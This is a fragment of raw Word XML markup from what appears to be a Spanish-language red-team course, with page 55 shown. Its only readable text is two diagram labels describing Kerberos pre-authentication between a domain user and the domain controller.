                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="507A977B" id="Group 161" o:spid="_x0000_s1026" style="position:absolute;margin-left:138.1pt;margin-top:1.45pt;width:729.85pt;height:512.9pt;z-index:-17968640;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="92690,6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">
                <v:shape id="Image 162" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:86837;height:6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">
                  <v:imagedata r:id="rId71" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 163" o:spid="_x0000_s1028" style="position:absolute;left:8745;top:15650;width:48329;height:28581;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4832985,28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" path="m3191522,673735r-6997,-3048l3113417,639699r1651,30988l3115106,671360r-793026,46571l2112149,733933r-204978,18288l1806714,762254r-195834,22352l1515503,796925r-93345,13462l1330972,824484r-89154,15367l1155204,855980r-84328,17526l989088,891921r-78994,19939l833894,932942r-73406,22352l690245,979170r-67171,25146l559320,1031240r-60452,28321l442099,1089533r-53340,31623l339356,1154684r-45593,35179l251980,1226947r-38100,38608l179463,1305814r-31115,41910l120662,1391031r-24511,44958l74815,1482090r-18415,47498l40779,1578483r-12954,49911l17665,1679575r-7747,52324l4457,1785112r-3302,54229l,1894459r889,55372l3530,2006612r4242,56795l13982,2123186r16256,118491l51320,2362327r25146,122301l104533,2608326r29972,124460l165493,2857627r12319,-3048l146824,2729738,116852,2605405,88912,2481961,63817,2360079r25,-305l42811,2239772,26568,2121789r-76,-496l20701,2064893r-102,-1016l20548,2063407r-4229,-56033l16268,2006612r-2654,-56146l13589,1949831r-877,-55118l13843,1840115r3149,-53518l22402,1734159r7493,-51105l30073,1682127r38,-495l30581,1679575r9335,-46775l52870,1582166r15468,-48133l86385,1487335r20955,-45466l131699,1397381r27063,-42291l189026,1314196r33579,-39320l222999,1274533r76,-203l223393,1273962r8369,-8407l260616,1236218r40894,-36246l346964,1164844r48501,-32855l448233,1100582r56223,-29591l564108,1043000r63665,-26746l694448,991108r68593,-23229l764235,967524r73088,-22390l913269,924052r74740,-18771l991984,904379r81559,-18554l1157617,868426r86487,-16129l1332877,837057r91186,-14224l1517154,809625r95250,-12446l1807984,774827r100330,-10033l2113165,746633r423545,-30226l2753372,703592r362408,-19532l3117481,715772r74041,-42037xem4831156,47802r-330,-1066l4830711,46355r-2044,-4445l4828552,41656r-1485,-2159l4825504,37211r-2717,-2667l4818519,30353r-254,-242l4812360,25908r-2858,-2032l4800892,19519r-1677,-850l4787836,14097r140,l4782972,12700,4743970,4445,4688979,254,4675175,r-28614,l4599825,1397r-50419,3048l4467491,11684r-89154,10033l4318012,29337,4059440,65659r1778,12573l4163657,63436r29375,-4115l4319536,41910,4440186,27432r83693,-8255l4575822,15367r48260,-2286l4646688,12700r28233,l4695241,13081r-4001,l4713452,14097r-2502,l4727448,15367r-724,l4743221,17145r-267,l4742446,17145r1715,203l4758296,19685r44844,15303l4812169,41910r3175,3048l4816653,46736r596,635l4817440,47802r444,585l4817516,47802r13640,xem4831956,50419r-622,-2032l4817884,48387r-165,l4818659,50419r13297,xem4832870,62230r-63,-6096l4832235,51308r-13157,l4818913,51308r749,2159l4820043,56134r102,6096l4819764,65151r-63,508l4819650,66141r-699,2566l4817249,75184r-20345,37985l4763147,156210r-29692,32740l4691189,231533r-65075,61329l4587760,327660r-90932,81407l4465332,437642r-2514,2463l4440440,417449r-27305,80772l4494034,471678r-13436,-13589l4471733,449122r2235,-2209l4505337,418465r90932,-81280l4634623,302260r37973,-35306l4709045,231775r33782,-34163l4772672,164592r25146,-30861l4824107,92075r8319,-25934l4832540,65151r330,-2921xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Image 164" o:spid="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:14414;top:1418;width:61634;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">
                  <v:imagedata r:id="rId72" o:title=""/>
                </v:shape>
                <v:shape id="Image 165" o:spid="_x0000_s1030" type="#_x0000_t75" style="position:absolute;left:76972;top:3028;width:254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">
                  <v:imagedata r:id="rId73" o:title=""/>
                </v:shape>
                <v:shape id="Image 166" o:spid="_x0000_s1031" type="#_x0000_t75" style="position:absolute;left:80429;top:1586;width:12261;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">
                  <v:imagedata r:id="rId74" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="146E388E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="637C69D7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F5372C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78525332" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="094E988F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="273F4EF0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42C40E60" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="71"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="766853C3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="11894"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51F6C275" wp14:editId="028EF30D">
                <wp:extent cx="2181225" cy="739140"/>
                <wp:effectExtent l="9525" t="0" r="0" b="13334"/>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739140"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="6BC410B8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="63" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="135" w:firstLine="496"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>2. DC descifra el mensaje y realiza una verificación</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5BC25CE7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="339" w:lineRule="exact"/>
                              <w:ind w:left="675"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>si todo está bien</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="51F6C275" id="Textbox 167" o:spid="_x0000_s1110" type="#_x0000_t202" style="width:171.7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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="6BC410B8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="63" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="135" w:firstLine="496"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>2. DC descifra el mensaje y realiza una verificación</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5BC25CE7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="339" w:lineRule="exact"/>
                        <w:ind w:left="675"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>si todo está bien</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B624658" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24316407" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15D73404" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BF33E43" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA8951D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="65"/>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20608" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="410EE675" wp14:editId="73ABDAD7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>306324</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>218336</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2181225" cy="739140"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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739140"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="33FD2222" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="257" w:right="141" w:hanging="116"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>1. El nombre de usuario de dominio con la hora actual se envía a DC</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1113441A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="339" w:lineRule="exact"/>
                              <w:ind w:left="682"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>en forma encriptada</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="410EE675" id="Textbox 168" o:spid="_x0000_s1111" type="#_x0000_t202" style="position:absolute;margin-left:24.1pt;margin-top:17.2pt;width:171.75pt;height:58.2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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="33FD2222" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="257" w:right="141" w:hanging="116"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>1. El nombre de usuario de dominio con la hora actual se envía a DC</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1113441A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="339" w:lineRule="exact"/>
                        <w:ind w:left="682"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>en forma encriptada</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="076D4E48" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0760E458" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B24C2AF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C4D8EB0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0667CAFC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E2DF3E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="589B221E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5278B582" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BD8298B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EBEBA39" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65FAF8F1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="682D2664" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2726B94C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="139F72D3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6704D6CD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="29"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FB1619F"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t>Curso del Equipo Rojo de CyberWarFare</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="888888"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="888888"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FAE0DD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId75"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="20" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D91386E"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49376" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="22F74DC3" wp14:editId="046EFBCC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1546733</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>18283</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="9479280" cy="651383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79280" cy="6513830"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="9479280" cy="6513830"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="170" name="Image 170"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId67" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="207391" y="0"/>
                            <a:ext cx="8683750" cy="6513608"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="171" name="Image 171"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId68" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="1648841" y="141863"/>
                            <a:ext cx="6163436" cy="338074"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="172" name="Image 172"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId69" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="7904606" y="302899"/>
                            <a:ext cx="254000" cy="67818"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="173" name="Image 173"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId76" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="8250301" y="158627"/>
                            <a:ext cx="1228979" cy="321310"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="174" name="Graphic 174"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1555496" y="1947676"/>
                            <a:ext cx="2737485" cy="2139950"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2737485" h="2139950">
                                <a:moveTo>
                                  <a:pt x="0" y="2060447"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="31114" y="2139696"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="69900" y="2076958"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="43179" y="2076958"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30479" y="2075941"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="31519" y="2064375"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="31620" y="2063250"/>
                                </a:lnTo>
                                <a:lnTo>
